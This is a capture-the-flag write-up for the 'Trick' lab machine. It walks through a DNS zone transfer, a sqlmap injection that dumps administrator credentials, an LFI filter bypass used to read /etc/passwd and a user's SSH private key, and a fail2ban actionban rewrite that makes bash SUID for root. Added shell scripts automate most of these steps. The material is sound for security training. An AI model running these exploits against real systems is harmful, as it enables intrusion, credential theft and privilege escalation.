CTF Trick

/etc/hosts

10.10.11.166 trick.htb

Rustscan

rustscan -a trick.htb

Output:

PORT   STATE SERVICE REASON
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
80/tcp open http syn-ack

wfuzz

So I tried to list directories and subdomains, but there is nothing.
This isn't the real website; I have to dig deeper.

Dig

dig a trick.htb @trick.htb

Output:

;; communications error to 10.10.11.166#53: connection refused
;; communications error to 10.10.11.166#53: connection refused
;; communications error to 10.10.11.166#53: connection refused

; <<>> DiG 9.18.7 <<>> a trick.htb @trick.htb
;; global options: +cmd
;; no servers could be reached

Port 53 refuses connections; should I reset the machine?

Lol, that was the solution.
https://stackoverflow.com/questions/131989/how-do-i-get-a-list-of-all-subdomains-of-a-domain

dig axfr trick.htb @trick.htb

The zone transfer (AXFR, which dig runs over TCP, unlike the UDP A lookup above) lists preprod-payroll.trick.htb.
I have to add it to /etc/hosts.
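As an added example (not part of the original writeup), a small POSIX shell helper that pulls the hostnames out of dig's AXFR output and turns them into a ready-made /etc/hosts line for the target IP. The AXFR records embedded below are constructed to match the shape of dig's output and the one name the transfer revealed; the live path at the bottom assumes the server still allows zone transfers, as it did here.

```shell
#!/bin/sh
# Added example: parse `dig axfr` output into an /etc/hosts line.
# Not from the writeup; the sample records below are constructed.

TARGET_IP="10.10.11.166"
ZONE="trick.htb"

# Read AXFR output on stdin, print unique FQDNs inside the zone (no trailing dot).
# Record lines look like:  name.  TTL  IN  TYPE  rdata
axfr_hosts() {
    grep -v '^;' \
        | awk 'NF >= 4 && $3 == "IN" { print $1 }' \
        | sed 's/\.$//' \
        | grep -Ei "(^|\.)${ZONE}\$" \
        | sort -u
}

# Read hostnames on stdin, emit one /etc/hosts line: "<ip> host1 host2 ...".
hosts_line() {
    awk -v ip="$TARGET_IP" 'BEGIN { printf "%s", ip } { printf " %s", $1 } END { print "" }'
}

# Constructed sample, shaped like real dig output (record data is made up,
# the CNAME name is the one the writeup found).
SAMPLE_AXFR='; <<>> DiG 9.18.7 <<>> axfr trick.htb @trick.htb
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800'

# Offline demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_AXFR" | axfr_hosts | hosts_line

# Live use against the box (needs network and sudo), only when asked for:
#   sh axfr_hosts.sh --live
if [ "${1:-}" = "--live" ]; then
    dig axfr "$ZONE" "@$TARGET_IP" | axfr_hosts | hosts_line | sudo tee -a /etc/hosts
fi
```

Running it without arguments prints `10.10.11.166 preprod-payroll.trick.htb trick.htb` from the sample; with `--live` it appends the real transfer's names to /etc/hosts.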

wfuzz

directory

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 'http://preprod-payroll.trick.htb/FUZZ'

Login page

There is a login page; let's try sqlmap.

sqlmap doesn't find anything; I think it needs the user agent or the cookie.

Request (copied from the browser as curl):

curl 'http://preprod-payroll.trick.htb/ajax.php?action=login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://preprod-payroll.trick.htb' -H 'Connection: keep-alive' -H 'Referer: http://preprod-payroll.trick.htb/login.php' -H 'Cookie: PHPSESSID=vle17ll7puj0b1kblu8c40ue3r' --data-raw 'username=fgh&password=fgh'

sqlmap

Replace curl with sqlmap and add --dbs to list the databases.

Now I'm going to list the tables in the database (payroll_db).

sqlmap 'http://preprod-payroll.trick.htb/ajax.php?action=login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://preprod-payroll.trick.htb' -H 'Connection: keep-alive' -H 'Referer: http://preprod-payroll.trick.htb/login.php' -H 'Cookie: PHPSESSID=vle17ll7puj0b1kblu8c40ue3r' --data-raw 'username=fgh&password=fgh' -D payroll_db --tables

Now dump the user table:

sqlmap 'http://preprod-payroll.trick.htb/ajax.php?action=login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://preprod-payroll.trick.htb' -H 'Connection: keep-alive' -H 'Referer: http://preprod-payroll.trick.htb/login.php' -H 'Cookie: PHPSESSID=vle17ll7puj0b1kblu8c40ue3r' --data-raw 'username=fgh&password=fgh' -D payroll_db -T users --dump

Output:

Database: payroll_db
Table: users
[1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| id | doctor_id | name          | type | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+

I can use these creds to log in.
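Added example (not from the writeup): the same login request saved as a raw HTTP request file and handed to sqlmap with -r, so the cookie, the XMLHttpRequest headers and the POST body are replayed exactly as the browser sent them, without the wall of -H flags. Host, path, headers and cookie come from the curl command above; the output file location and the use of --batch are my assumptions.

```shell
#!/bin/sh
# Added example: build a raw request file for `sqlmap -r`.
# Not the writeup's own commands; the request mirrors the curl call shown above.

REQ_FILE="${REQ_FILE:-${TMPDIR:-/tmp}/login.req}"

# Write a raw HTTP/1.1 request for the ajax.php login call.
# $1 = PHPSESSID value, $2 = URL-encoded POST body
write_login_request() {
    sess="$1"; body="$2"
    {
        printf 'POST /ajax.php?action=login HTTP/1.1\r\n'
        printf 'Host: preprod-payroll.trick.htb\r\n'
        printf 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0\r\n'
        printf 'Accept: */*\r\n'
        printf 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n'
        printf 'X-Requested-With: XMLHttpRequest\r\n'
        printf 'Referer: http://preprod-payroll.trick.htb/login.php\r\n'
        printf 'Cookie: PHPSESSID=%s\r\n' "$sess"
        printf 'Content-Length: %d\r\n' "${#body}"
        printf '\r\n%s' "$body"          # blank line, then the body (no trailing newline)
    } > "$REQ_FILE"
}

# The enumeration chain from the writeup, driven from the saved request.
# Needs network access to the box, so it only runs when explicitly requested.
run_sqlmap() {
    sqlmap -r "$REQ_FILE" --batch --dbs
    sqlmap -r "$REQ_FILE" --batch -D payroll_db --tables
    sqlmap -r "$REQ_FILE" --batch -D payroll_db -T users --dump
}

write_login_request "vle17ll7puj0b1kblu8c40ue3r" "username=fgh&password=fgh"
printf 'wrote %s\n' "$REQ_FILE"

if [ "${1:-}" = "--run" ]; then
    run_sqlmap
fi
```

If the session cookie expires mid-scan, regenerate the file with the new PHPSESSID rather than editing the sqlmap command line; the request file is the single source of truth for what sqlmap sends.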

Website 1

LFI

When I saw index.php?page=, I tried to exploit it with wfuzz, but didn't find anything.

wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --sc 200 'http://preprod-payroll.trick.htb/index.php?page=../../../../../../../FUZZ'

If I can't exploit it, maybe there is some information to gather.

Subdomain

wfuzz

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://trick.htb' -H "Host: FUZZ.trick.htb" >> subdomains &

Found nothing. (When fuzzing the Host header this way, hide the default vhost's response with --hh <chars> or --hw <words> taken from a baseline request; otherwise every candidate comes back 200 and nothing stands out.)
The last subdomain was preprod-payroll, because it's a preprod server.
So I should keep the preprod- prefix and try again.

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://trick.htb' -H "Host: preprod-FUZZ.trick.htb" >> subdomains &

Now I know what the last website was for: it pointed me to this subdomain.

Website 2

http://preprod-marketing.trick.htb

Ok, I have to add it to /etc/hosts.

And voilà.

It was made with this template: https://templatemo.com/tm-547-real-dynamic

We have a few users:

Erik Morris
Michael Owen
Mary Kay
Jen Terry
Levi Moore

And again, there is a ?page= parameter.

wfuzz

I wanted to try a few wordlists.

wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --sc 200 'http://preprod-marketing.trick.htb/index.php?page=../../../../../../../FUZZ' >> fli.txt &

http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//etc/passwd

The ....// form gets through where plain ../ did not, which is what you'd expect from a filter that removes ../ once rather than recursively: after one removal each ....// collapses back to ../.

Yeah! /etc/passwd shows michael is a user.
Let's get the flag.
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//home/michael/user.txt
Now let's grab the private ssh key.
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa
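Added example (not part of the writeup): a shell emulation of why the ....// payload works. The assumption is that the page parameter goes through a single, non-recursive removal of ../ (PHP's str_replace('../', '', $page) behaves exactly like the sed call below) before being included; the writeup only shows that ....// worked and ../ did not, so the filter itself is my assumption. The helper also builds payloads of any depth, which is more general than the fixed nine segments used above.

```shell
#!/bin/sh
# Added example: emulate a one-pass "../" strip and show what survives it.
# Not from the writeup; the filter modelled here is an assumption.

# One-pass, left-to-right removal of "../", the way str_replace('../','',$p) does it.
strip_once() {
    printf '%s' "$1" | sed 's#\.\./##g'
}

# Build a traversal payload: N copies of "....//" in front of a path.
payload() {
    depth="$1"; path="$2"; out=""; i=0
    while [ "$i" -lt "$depth" ]; do
        out="${out}....//"
        i=$((i + 1))
    done
    printf '%s%s' "$out" "$path"
}

# What include() actually receives once the filter has run over the payload.
after_filter() {
    strip_once "$(payload "$1" "$2")"
}

# Live fetch against the box (network needed): depth 9 is what the writeup used.
fetch() {
    curl -s "http://preprod-marketing.trick.htb/index.php?page=$(payload 9 "$1")"
}

# Offline demonstration: the naive payload is neutralised, the doubled one is not.
printf 'naive   : %s -> %s\n' '../../etc/passwd' "$(strip_once '../../etc/passwd')"
printf 'doubled : %s -> %s\n' "$(payload 2 etc/passwd)" "$(after_filter 2 etc/passwd)"

if [ "${1:-}" = "--fetch" ]; then
    fetch "${2:-etc/passwd}"
fi
```

Running it offline prints `../../etc/passwd -> etc/passwd` for the naive payload and `....//....//etc/passwd -> ../../etc/passwd` for the doubled one; `sh lfi.sh --fetch home/michael/.ssh/id_rsa` performs the same request the writeup made by hand.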

sudo exploit

sudo -l

Output:

Matching Defaults entries for michael on trick:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart

We have to play with fail2ban; there is nothing on GTFOBins.

https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I have to modify the action file iptables-multiport.conf (under /etc/fail2ban/action.d/), but I can't write to it.
So I have to copy it somewhere, edit the copy, and move it back over the original; that needs write permission on the directory, not on the file.

Then set the actionban line in the copied iptables-multiport.conf to actionban = chmod u+s /bin/bash and move the copy over the original.
Restart the service with sudo /etc/init.d/fail2ban restart so it loads the modified action.
Then trigger a ban: try to log in via ssh 5 times without the private key and with a wrong password.
When the ban fires, fail2ban runs the actionban command as root, /bin/bash becomes SUID, and bash -p gives a root shell.
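Added example (not from the writeup): the action-file swap as one script, with the checks a practitioner wants before touching anything. It assumes the standard location /etc/fail2ban/action.d/iptables-multiport.conf, that the current user can create and rename files in that directory (the file itself may be read-only), and the NOPASSWD restart from sudo -l above. The constructed config snippet in the test is shaped like the [Definition] section of the real action file.

```shell
#!/bin/sh
# Added example: replace fail2ban's actionban with a SUID drop, safely staged.
# Not the writeup's own script; paths and the directory-permission assumption are mine.

ACTION_DIR="${ACTION_DIR:-/etc/fail2ban/action.d}"
ACTION_FILE="iptables-multiport.conf"
PAYLOAD='chmod u+s /bin/bash'

# Can we create/rename files here? That is what matters for replacing a read-only file.
can_replace_in() {
    [ -w "$1" ] && [ -x "$1" ]
}

# Rewrite the actionban line of $1 into $2. Only "actionban =" is touched;
# actionstart/actionstop/actionunban keep their iptables commands.
patch_action() {
    sed "s#^actionban *=.*#actionban = ${PAYLOAD}#" "$1" > "$2"
}

# Exactly one actionban line, and it carries our payload.
check_patch() {
    [ "$(grep -c '^actionban *=' "$1")" -eq 1 ] && grep -q "^actionban = ${PAYLOAD}\$" "$1"
}

# Stage the copy in the same directory so mv is an atomic rename(2) that
# replaces the read-only file using directory permissions only.
exploit() {
    can_replace_in "$ACTION_DIR" || { echo "cannot replace files in $ACTION_DIR" >&2; return 1; }
    tmp="$(mktemp "$ACTION_DIR/.${ACTION_FILE}.XXXXXX")" || return 1
    patch_action "$ACTION_DIR/$ACTION_FILE" "$tmp" && check_patch "$tmp" || { rm -f "$tmp"; return 1; }
    chmod 644 "$tmp"                            # fail2ban (root) must be able to read it
    mv "$tmp" "$ACTION_DIR/$ACTION_FILE"
    sudo /etc/init.d/fail2ban restart           # the NOPASSWD entry from sudo -l
    echo "now fail SSH login 5 times from your attacking box, then run: /bin/bash -p"
    # From the attacking machine, e.g.:
    #   ssh -o PubkeyAuthentication=no -o PreferredAuthentications=password michael@trick.htb
    # repeated with a wrong password until the sshd jail bans you.
}

case "${1:-}" in
    --go) exploit ;;
    *)    echo "dry run: use --go to stage the file and restart fail2ban" ;;
esac
```

The check_patch step matters because fail2ban reads the action file only at (re)start: if the line did not change, the restart is wasted and the ban will run the original iptables command instead.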